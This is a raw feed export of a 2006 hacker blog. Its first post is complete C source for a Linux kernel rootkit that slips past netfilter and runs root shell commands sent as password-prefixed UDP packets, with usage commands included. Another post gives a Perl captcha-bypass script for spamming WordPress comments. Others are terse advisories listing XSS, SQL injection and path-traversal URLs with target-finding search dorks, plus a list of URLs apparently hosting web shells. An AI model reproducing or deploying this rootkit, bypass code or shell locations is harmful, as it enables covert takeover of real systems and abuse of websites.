tag:blogger.com,1999:blog-258944142011-12-09T03:33:37.984-08:00d4igorohttp://www.blogger.com/profile/16525130417397597702noreply@blogger.comBlogger141100tag:blogger.com,1999:blog-25894414.post-1160778192015960272006-10-13T15:20:00.000-07:002006-10-13T15:23:12.026-07:00/*<br /> * rprk 0.1 - a simple rootkit for linux 2.6<br /> *<br /> * this programm is only for education purposes designed,<br /> * you are _not_ allowed to distribute this programm.<br /> *<br /> * usage:<br /> * compile the module for you target hosts kernel.<br /> * load the module with the parameters "password" and "listen_port",<br /> * e.g: insmod rprk.ko password=lamo listen_port=5555<br /> * now you can control the target host.<br /> * the rootkit even bypasses linux's netfilter.<br /> * e.g: echo "lamotouch /rp_was_here"|netcat -u target.host.com 5555<br /> * this will execute the command "touch /rp_was_here" on target.host.com.<br /> *<br /> */<br /><br />#include <linux/config.h><br />#include <linux/module.h><br />#include <linux/moduleparam.h><br />#include <linux/kmod.h><br />#include <linux/vmalloc.h><br />#include <linux/netfilter.h><br />#include <linux/netfilter_ipv4.h><br />#include <linux/in.h><br />#include <linux/ip.h><br />#include <linux/udp.h><br />#include <linux/string.h><br />#include <linux/workqueue.h><br /><br />struct exec_work {<br /> struct work_struct work;<br /> char *command;<br />};<br /><br />static char password[256];<br />static char clisten_port[17];<br />static long listen_port;<br /><br />static void exec_func(void *data)<br />{<br /> struct exec_work *exec_work = data;<br /> char *argv[] = { "/bin/sh", "-c", exec_work->command, NULL };<br /> static char *envp[] = { "HOME=/", "TERM=linux",<br /> "PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };<br /><br /> call_usermodehelper("/bin/sh", argv, envp, 0);<br />}<br /><br />module_param_string(password, password, 256, 0);<br />MODULE_PARM_DESC(password, " password=secret\n");<br />module_param_string(listen_port, clisten_port, 17, 0);<br />MODULE_PARM_DESC(listen_port, " listen_port=6666\n");<br /><br />static inline int execute_command(char *cmd)<br />{<br /> struct exec_work *exec_work;<br /><br /> exec_work = kmalloc(sizeof(struct exec_work), GFP_ATOMIC);<br /> exec_work->command = kmalloc(1024 * sizeof(char), GFP_ATOMIC);<br /><br /> INIT_WORK(&exec_work->work, exec_func, exec_work);<br /><br /> strncpy(exec_work->command, cmd, strlen(cmd) + 1);<br /> schedule_work(&exec_work->work);<br /><br /> return 0; <br />}<br /><br />static unsigned int hook_handle(unsigned int hooknum,<br /> struct sk_buff **skb_p,<br /> const struct net_device *in,<br /> const struct net_device *out,<br /> int (*okfn)(struct sk_buff *))<br />{<br /> struct sk_buff *skb = *skb_p;<br /> struct iphdr *iph = skb->nh.iph;<br /> struct udphdr *udph = (struct udphdr *)(skb->data + iph->ihl * 4);<br /> unsigned int payload_offset = (iph->ihl * 4) + 8;<br /> char *payload = skb->data + payload_offset;<br /> char *sent_passwd, *sent_command;<br /> int i, passwdlen, sent_strlen = skb->len - payload_offset;<br /><br /> if (iph->protocol != IPPROTO_UDP)<br /> goto out;<br /><br /> if(!(ntohs(udph->dest) == listen_port))<br /> goto out;<br /><br /> if(sent_strlen > 1024)<br /> sent_strlen = 1024;<br /><br /> passwdlen = strlen(password);<br /><br /> if(sent_strlen < 1 || sent_strlen < passwdlen)<br /> goto out;<br /><br /> if(!(sent_passwd = kmalloc(passwdlen * sizeof(char) + 1, GFP_ATOMIC)))<br /> goto out1;<br /><br /> if(!(sent_command = kmalloc((sent_strlen - passwdlen) * sizeof(char) + 1, GFP_ATOMIC)))<br /> goto out0;<br /><br /> for (i = 0; i < passwdlen; i++)<br /> sent_passwd[i] = payload[i];<br /> for (i = 0 ; i < sent_strlen - passwdlen; i++){<br /> if(payload[i + passwdlen] == '\n'){<br /> sent_command[i] = '\0';<br /> break;<br /> }<br /> sent_command[i] = payload[i + passwdlen];<br /> }<br /><br /> if(strncmp(sent_passwd, password, passwdlen) == 0){<br /> execute_command(sent_command);<br /> }<br /><br />out0:<br /> kfree(sent_command);<br />out1:<br /> kfree(sent_passwd);<br />out:<br /> return NF_ACCEPT;<br />}<br /><br />static struct nf_hook_ops rprk_ops = {<br /> .hook = hook_handle,<br /> .owner = THIS_MODULE,<br /> .pf = PF_INET,<br /> .hooknum = NF_IP_LOCAL_IN,<br /> .priority = NF_IP_PRI_FIRST<br />};<br /><br />static int __init init(void)<br />{<br /> int err;<br /><br /> listen_port = simple_strtol(clisten_port, NULL, 0);<br /> <br /> if(!password)<br /> return 1;<br /> if(!(listen_port > 0 && listen_port < 65536))<br /> return 1;<br /><br /> err = nf_register_hook(&rprk_ops);<br /> if(err < 0)<br /> return err;<br /><br /> return 0;<br />}<br /><br />static void __exit fini(void)<br />{<br /> nf_unregister_hook(&rprk_ops);<br />}<br /><br />module_init(init);<br />module_exit(fini);<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-116077819201596027?l=d4igoro.blogspot.com' alt='' /></div>d4igorohttp://www.blogger.com/profile/16525130417397597702noreply@blogger.com21tag:blogger.com,1999:blog-25894414.post-1152322989548360512006-07-07T18:41:00.000-07:002006-07-07T18:50:43.303-07:00wordpress plugin against spam (@ Michael Woehrer)<br />-> http://sw-guide.de/wordpress/math-comment-spam-protection-plugin/<br /><br />easy to by-pass you must only send $mathuseranswer + $mathresult with any validate value.<br /><br /><code><br />#!/usr/bin/perl -w<br /><br />use HTTP::Request::Common qw(POST);<br />use LWP::UserAgent;<br />use strict;<br /> <br /># mathuseranswer 9+5 14<br /># mathresult 59568733<br /><br /><br />my $url = 'http://localhost/wordpress/wp-comments-post.php';<br /> <br />my $req = POST $url,<br /> [ <br /> comment_post_ID => '3',<br /> author => 'spam',<br /> email => 'more\@spam.com',<br /> comment => 'spammm2',<br /> mathuseranswer => '14',<br /> mathresult => '59568733'<br /> ];<br /><br />print "HTTP-FullRequest-Header: \n";<br />print $req->headers->as_string() , "\n";<br /> <br />print "HTTP-FullRequest-Header-Content: \n";<br />print $req->content() ,"\n";<br /> <br /> <br />my $ua = LWP::UserAgent->new();<br /> <br />my $response = $ua->request($req);<br /> <br />if ( $response->is_error() ) {<br /> print "Error-Code : ", $response->code() , "\n";<br /> print "Fehlermeldung: ", $response->message() , "\n";<br />}<br />else {<br /> print $response->content() , "\n";<br />}<br /></code><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-115232298954836051?l=d4igoro.blogspot.com' alt='' /></div>d4igorohttp://www.blogger.com/profile/16525130417397597702noreply@blogger.com4tag:blogger.com,1999:blog-25894414.post-1146855366139381312006-05-05T11:47:00.000-07:002006-05-05T11:56:41.873-07:00<code><br />(c)2005-Comments-Script - XSS Vulnerability<br />--------------------------------------------------------<br />Software: (c)2005-Comments-Script<br />Version:<br />Type: XSS Vulnerability<br />Date: Mai 5 20:45:53 CEST 2006<br />Vendor: Www.Goël.Ch<br />Page: http://xn--gol-kma.ch<br />Risc: low<br /><br />credits:<br />----------------------------<br />d4igoro - d4igoro[at]gmail[dot]com<br />http://d4igoro.blogspot.com/<br /><br />vulnerability:<br />----------------------------<br />http://[target]/kommentar.php?id=[XSS]<br /><br />solution:<br />----------------------------<br />validate $id<br /><br /><br />notes:<br />----------------------------<br />The vendor has been informed.<br /></code><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-114685536613938131?l=d4igoro.blogspot.com' alt='' /></div>d4igorohttp://www.blogger.com/profile/16525130417397597702noreply@blogger.com15tag:blogger.com,1999:blog-25894414.post-1146851369353714892006-05-05T10:43:00.000-07:002006-05-05T11:27:41.383-07:00<code><br />Dynamic Galerie 1.0 - path traversal + XSS Vulnerability<br />--------------------------------------------------------<br />Software: Dynamic Galerie<br />Version: 1.0<br />Type: path traversal + XSS Vulnerability<br />Date: Mai 5 19:45:53 CEST 2006<br />Vendor: timo braun<br />Page: http://www.timobraun.de/<br />Risc: middle<br /><br />credits:<br />----------------------------<br />d4igoro - d4igoro[at]gmail[dot]com<br />http://d4igoro.blogspot.com/<br /><br />vulnerability:<br />----------------------------<br />http://[target]/index.php?pfad=/tmp/<br />http://[target]/galerie.php?pfad=/home/<br /><br />http://[target]/index.php?pfad=[XSS]<br />http://[target]/galerie.php?id=[XSS]<br /><br /><br />solution:<br />----------------------------<br />validate $pfad, $id<br /><br /><br />notes:<br />----------------------------<br />The vendor has been informed.<br /></code><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-114685136935371489?l=d4igoro.blogspot.com' alt='' /></div>d4igorohttp://www.blogger.com/profile/16525130417397597702noreply@blogger.com6tag:blogger.com,1999:blog-25894414.post-1146613069397658432006-05-02T16:28:00.000-07:002006-05-02T16:43:01.873-07:00<code><br />321soft PhP Gallery 0.9 - directory travel & XSS<br />--------------------------------------------------------<br />Software: 321soft PhP Gallery<br />Version: 0.9<br />Type: directory travel & XSS<br />Date: Mai 3 01:38:04 CEST 2006<br />Vendor: 321soft.de<br />Page: http://321soft.de/<br />Risc: Middle<br /><br />credits:<br />----------------------------<br />d4igoro - d4igoro[at]gmail[dot]com<br />http://d4igoro.blogspot.com/<br /><br />vulnerability:<br />----------------------------<br />http://[target]/index.php?path=/etc<br />http://[target]/index.php?path=/tmp<br /><br />http://[target]/index.php?path=[XSS]<br /><br />solution:<br />----------------------------<br />index.php<br />fix $path<br /><br />notes:<br />----------------------------<br />The vendor has been informed.<br /></code><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-114661306939765843?l=d4igoro.blogspot.com' alt='' /></div>d4igorohttp://www.blogger.com/profile/16525130417397597702noreply@blogger.com94tag:blogger.com,1999:blog-25894414.post-1146610174774867172006-05-02T15:39:00.000-07:002006-05-02T16:03:09.100-07:00<code><br />Linpha - XSS Vulnerabilities<br />--------------------------------------------------------<br />Software: PHP Linkliste<br />Version: 1.0b<br />Type: Cross Site Scripting Vulnerability<br />Date: Wed Mai 3 00:45:02 CEST 2006<br />Vendor: php design x<br />Page: http://www.php-designx.de<br />Risc: middle<br /><br />credits:<br />----------------------------<br />d4igoro - d4igoro[at]gmail[dot]com<br />http://d4igoro.blogspot.com/<br /><br />vulnerability:<br />----------------------------<br />http://[target]/links.php?new_input=[XSS]&new_url=[XSS]&new_name=[XSS]<br />the content is written in links.dat which have chmod 777 (readme)<br /><br />solution:<br />----------------------------<br />validate in links.php all formfields.<br /><br /></code><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-114661017477486717?l=d4igoro.blogspot.com' alt='' /></div>d4igorohttp://www.blogger.com/profile/16525130417397597702noreply@blogger.com3tag:blogger.com,1999:blog-25894414.post-1146606170829743282006-05-02T14:35:00.000-07:002006-05-03T08:21:02.240-07:00<code><br />http://www.knowledgebase-script.com/demo/search.php?searchkeyword=[XSS]<br /></code><br /><br />update:<br />the vendor have informed me that there is no hole.<br />i only had a look on the online demo. if you want you can send me a fullversion. :)<br /><br />and sorry guys i didnt post it to http://secunia.com/<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-114660617082974328?l=d4igoro.blogspot.com' alt='' /></div>d4igorohttp://www.blogger.com/profile/16525130417397597702noreply@blogger.com40tag:blogger.com,1999:blog-25894414.post-1146486976382107402006-05-01T05:35:00.000-07:002006-05-01T05:38:43.020-07:00<code><br />myvideo.de is a new site for free-video-hosting.<br /><br />in all formfields i saw, it was possible to include javascript-code.<br />the use unsecure-cookies, so it is easy to steal them and login as another person.<br /><br />examples:<br /><br />http://www.myvideo.de/watch/xy (comment-box)<br />http://www.myvideo.de/online/page.php?P=xy&U_ID=xy (profil)<br />http://www.myvideo.de/online/page.php?P=xy&volltext=[XSS]&Submit=Suche (search-box)<br /></code><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-114648697638210740?l=d4igoro.blogspot.com' alt='' /></div>d4igorohttp://www.blogger.com/profile/16525130417397597702noreply@blogger.com9tag:blogger.com,1999:blog-25894414.post-1145307767887005322006-04-17T14:02:00.000-07:002006-04-17T14:02:47.896-07:00<code><br />Linpha - XSS Vulnerabilities<br />--------------------------------------------------------<br />Software: Linpha<br />Version: 1.1.0<br />Type: Cross Site Scripting Vulnerability<br />Date: Mon Apr 17 22:59:39 CEST 2006<br />Vendor: The LinPHA developers<br />Page: http://linpha.sourceforge.net/<br />Risc: Low<br /><br />credits:<br />----------------------------<br />d4igoro - d4igoro[at]gmail[dot]com<br />http://d4igoro.blogspot.com/<br />Greetz: karambole<br /><br />vulnerability:<br />----------------------------<br />http://[target]/plugins/stats/stats_view.php?date_from=[XSS]<br />http://[target]/plugins/stats/stats_view.php?date_to=[XSS]<br />http://[target]/plugins/stats/stats_view.php?date=[XSS]<br /><br />notes:<br />----------------------------<br />The vendor has been informed.<br /></code><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-114530776788700532?l=d4igoro.blogspot.com' alt='' /></div>d4igorohttp://www.blogger.com/profile/16525130417397597702noreply@blogger.com5tag:blogger.com,1999:blog-25894414.post-1144964526392805002006-04-13T14:41:00.000-07:002006-04-13T14:42:44.800-07:00<code><br />PowerClan 1.14 - SQL Injection<br />--------------------------------------------------------<br />Software: PowerClan 1.14<br />Version: 1.14<br />Type: SQL Injection<br />Date: Apr 13 23:37:50 CEST 2006<br />Vendor: powerscripts.org<br />Page: http://www.powerscripts.org<br />Risc: Middle<br /><br />credits:<br />----------------------------<br />d4igoro - d4igoro[at]gmail[dot]com<br />http://d4igoro.blogspot.com/<br /><br />vulnerability:<br />----------------------------<br />magic_quotes_gpc = off<br />http://[target]/member.php?pcpage=showmember&memberid=[SQL]<br /><br />solution:<br />----------------------------<br />member.php<br />fix $memberid<br /><br />notes:<br />----------------------------<br />The vendor has been informed.<br /></code><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-114496452639280500?l=d4igoro.blogspot.com' alt='' /></div>d4igorohttp://www.blogger.com/profile/16525130417397597702noreply@blogger.com5tag:blogger.com,1999:blog-25894414.post-1144954578801967372006-04-13T11:53:00.000-07:002006-04-13T12:00:17.390-07:00<code><br />planetSearch+ - XSS Vulnerabilities<br />--------------------------------------------------------<br />Software: planetSearch+<br />Version: 26.10.2005<br />Type: Cross Site Scripting Vulnerability<br />Date: Apr 13 20:44:54 CEST 2006<br />Vendor: PlaNet Concept e.K.<br />Page: http://www.planetc.de<br />Risc: Low<br /><br />credits:<br />----------------------------<br />d4igoro - d4igoro[at]gmail[dot]com<br />http://d4igoro.blogspot.com/<br />Greetz: kara & hm<br /><br />vulnerability:<br />----------------------------<br />http://[target]/planetsearchplus.php?search_exp=[XSS]<br /><br />solution:<br />----------------------------<br />planetsearchplus.php<br />fix $search_exp<br /><br />notes:<br />----------------------------<br />The vendor has been informed.<br /><br />googledork:<br />----------------------------<br />intitle:"planetSearch+"<br /></code><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-114495457880196737?l=d4igoro.blogspot.com' alt='' /></div>d4igorohttp://www.blogger.com/profile/16525130417397597702noreply@blogger.com6tag:blogger.com,1999:blog-25894414.post-1144794933375226642006-04-11T15:27:00.000-07:002006-04-11T15:46:07.150-07:00http://doudak.persiangig.com/cs.ipg?&cmd=id<br />http://www.deltashadowforce.com/includes/c?cmd=id<br />http://sonorauto.com.br/tool25.gif<br />http://spyval.com/cse.gif<br />http://tools.kit.net/cmd.txt<br />http://ecidade.com.br/images/xpl/lila.jpg<br />http://hackervend3r.tripod.com/oke.txt<br />http://hitam-putih.info/saben.jpg<br />http://kicflex.com/image/.nd/c99last.txt<br />http://www.nicwilson0.plus.com/temp/reel.txt<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-114479493337522664?l=d4igoro.blogspot.com' alt='' /></div>d4igorohttp://www.blogger.com/profile/16525130417397597702noreply@blogger.com10tag:blogger.com,1999:blog-25894414.post-1144787139600336102006-04-11T13:25:00.000-07:002006-04-11T13:25:39.610-07:00<code><br />Tritanium Bulletin Board 1.2.3 - XSS Vulnerabilities<br />--------------------------------------------------------<br />Software: Tritanium Bulletin Board 1.2.3 <br />Version: 1.2.3<br />Type: Cross Site Scripting Vulnerability<br />Date: Die Apr 11 21:57:50 CEST 2006<br />Vendor: tritanium<br />Page: http://www.tritanium-scripts.com/<br />Risc: Low<br /><br />credits:<br />----------------------------<br />d4igoro - d4igoro[at]gmail[dot]com<br />http://d4igoro.blogspot.com/<br /><br />vulnerability:<br />----------------------------<br />register_globals On<br /><br />http://[target]/index.php?faction=register&newuser_name=[XSS]<br />http://[target]/index.php?faction=register&newuser_email=[XSS]<br />http://[target]/index.php?faction=register&newuser_hp=[XSS]<br /><br />solution:<br />----------------------------<br />register.php<br />line 26-33 : better validating<br /><br />notes:<br />----------------------------<br />The vendor has been informed.<br /><br />googledork:<br />----------------------------<br />"2001/2002 Tritanium Scripts"<br /></code><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-114478713960033610?l=d4igoro.blogspot.com' alt='' /></div>d4igorohttp://www.blogger.com/profile/16525130417397597702noreply@blogger.com7tag:blogger.com,1999:blog-25894414.post-1144782777848229342006-04-11T12:10:00.000-07:002006-04-11T12:45:06.136-07:00<code><br />Manila <= 9.5 - XSS Vulnerabilities<br />--------------------------------------------------------<br />Software: Manila<br />Version: <= 9.5<br />Type: Cross Side Scripting Vulnerability<br />Date: Die Apr 11 21:33:54 CEST 2006<br />Vendor: UserLand Software<br />Page: http://manila.userland.com/<br />Risc: Middle<br /><br />credits:<br />----------------------------<br />d4igoro - d4igoro[at]gmail[dot]com<br />http://d4igoro.blogspot.com/<br /><br />vulnerability:<br />----------------------------<br />http://[target]/discuss/msgReader$1?mode=[XSS]<br />http://[target]/newsItems/viewDepartment$[XSS]<br /><br />solution:<br />----------------------------<br />There isn't a solution yet.<br /><br />notes:<br />----------------------------<br />At the time of posting no known official patches are available for this vulnerability.<br />The vendor has been informed.<br /></code><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-114478277784822934?l=d4igoro.blogspot.com' alt='' /></div>d4igorohttp://www.blogger.com/profile/16525130417397597702noreply@blogger.com7